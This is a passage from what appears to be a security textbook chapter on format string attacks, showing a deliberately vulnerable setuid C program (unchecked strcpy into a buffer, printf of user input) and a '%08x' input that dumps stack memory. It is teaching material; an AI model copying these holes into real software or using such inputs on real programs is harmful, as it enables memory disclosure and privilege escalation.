data section
char temp[2048]; // string to hold large temp string
strcpy(temp, argv[1]); // take argv1 input and jam into temp
printf(temp); // print value of temp
printf("\n"); // print carriage return
printf("Canary at 0x%08x = 0x%08x\n", &canary, canary); //print canary
}
#gcc -o fmtstr fmtstr.c
#./fmtstr Testing
Testing
Canary at 0x08049440 = 0x00000000
#chmod u+s fmtstr
#su joeuser
$
NOTE The ???Canary??? value in the code is just a placeholder for now. It is
important to realize that your value will certainly be different. For that matter,
your system may produce different values for all the examples in this chapter;
however, the results should be the same.
Reading from Arbitrary Memory
We will now begin to take advantage of the vulnerable program.We will start slowly and
then pick up speed. Buckle up, here we go!
Using the %x Token to Map Out the Stack
As shown in Table 8-1, the %x format token is used to provide a hex value. So if we were
to supply a few of %08x tokens to our vulnerable program, we should be able to dump
the stack values to the screen:
$ ./fmtstr "AAAA %08x %08x %08x %08x"
AAAA bffffd2d 00000648 00000774 41414141
Canary at 0x08049440 = 0x00000000
$
The 08 is used to define precision of the hex value (in this case 8 bytes wide).
Pages:
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349